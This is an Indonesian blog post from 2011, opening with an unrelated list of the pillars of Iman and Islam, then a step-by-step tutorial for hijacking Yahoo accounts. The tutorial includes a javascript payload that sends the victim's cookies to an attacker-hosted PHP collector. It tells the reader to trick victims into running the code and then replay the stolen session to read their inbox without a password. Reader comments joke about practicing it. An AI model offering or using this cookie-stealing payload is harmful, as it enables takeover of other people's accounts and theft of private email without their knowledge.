PENTING!!!


Rukun Iman terdiri dari enam perkara: (1) Iman kepada Allah. (2) Iman kepada malaikat-malaikat Allah. (3) Iman kepada kitab-kitab Allah. (4) Iman kepada rasul-rasul Allah. (5) Iman kepada hari kiamat. (6) Iman kepada Qada dan Qadar.

Rukun Islam terdiri dari lima perkara: (1) Mengucap dua kalimat syahadat. (2) Menunaikan shalat lima waktu. (3) Mengeluarkan zakat. (4) Berpuasa pada bulan Ramadan. (5) Menunaikan Haji bagi mereka yang mampu.

[Hack] Session Hijacking pada Account Yahoo - Stealing Cookies

Saturday, March 26, 2011 Diposkan oleh Anggit Supriyanto

Sebelum membaca tutorial ini saya anggap anda sudah mengetahui apa itu session hijacking, stealing cookies dan cookies itu sendiri sekarang anda dapat mencoba melakukan stealing cookies pada account Yahoo.

Pertama silahkan masuk ke www.yahoo.com lalu ketikan kode berikut pada address bar:

javascript:alert(document.
cookie);

Anda akan mendapatkan kotak yang menampilkan pop up cookie yang ditinggalkan Yahoo pada PC anda.

Sekarang login ke account Yahoo anda lalu lakukan hal yang sama seperti diatas. Anda akan melihat beberapa elemen tambahan yang ada pada cookie. Itulah session id anda. Jadi sekarang anda tahu bahwa Yahoo menyimpan session id dalam bentuk cookie pada web browser.
Attacker dapat mencuri session dengan cara meyakinkan korban untuk mengeksekusi sebuah kode dalam browsernya. Kemudian attacker menggunakan session yang dicuri untuk masuk kedalam account korban tanpa perlu memberikan username ataupun password. Serangan ini jarang dilakukan karena saat korban sign out dari accountnya maka attacker juga ikut sign out.
Namun dalam kasus Yahoo, itu berbeda. Attacker tidak ikut sign out ketika korban melakukan sign out. Meskipun oleh Yahoo session tersebut akan otomatis dihapus dalam waktu 24 jam, tapi ketika user me-refresh kembali account Yahoo-nya maka dia akan mendapatkan kembali session  untuk 24 jam berikutnya. Ini berarti setelah session account yahoo dicuri, attacker masih bisa mengakses account tersebut dengan me-refresh setiap 24 jam.

Script yang dibutuhkan dapat didownlad di:

Langkah-langkah stealing cookies session:
Log in ke account web hosting anda lalu ke file manager, saya menggunakan my3gb.com.

Upload keempat file didalam rar yang baru saja anda download dan kemudian buat direktori baru dengan nama"cookies".

Sekarang berikan kode ini kepada korban untuk dieksekusi dalam web browsernya ketika dia akan log in ke account Yahoo-nya:

javascript:document.location='http://domainanda.com/yahoo.php?ex='
.concat(escape(document.cookie));

Ketika korban mengeksekusi kode tersebut di web browsernya, dia akan di-redirect kembali ke account Yahoo-nya.

Sekarang silahkan anda buka hacked.php:

http://domainanda.com/hacked.php

Masukan password (default: CR@5H n BURN).

Sekarang anda telah mendapatkan username account korban. Cukup klik dan anda akan dibawa ke inbox korban tanpa meminta password.

Catatan: Anda dapat mencoba serangan ini dengan menggunakan dua web browser. Sign in ke account yahoo meggunakan satu web browser dan jalankan kode tersebut. Kemudian sign in melalui web browser lain menggunakan session yang dicuri.

Label: , ,

3 komentar:

  Anonymous

March 26, 2011 at 11:56 AM

ntar di kelas ajarin yo... langsung praktek.. :-D

  Anggit Supriyanto

March 26, 2011 at 1:09 PM

kalo di kelas sih minta ajarin sm dosen aja lebih yahud! :D

  Anonymous

August 18, 2011 at 11:01 AM

Kurang jelas ganKurang jelas gan

Post a Comment

Subscribe to: Post Comments (Atom)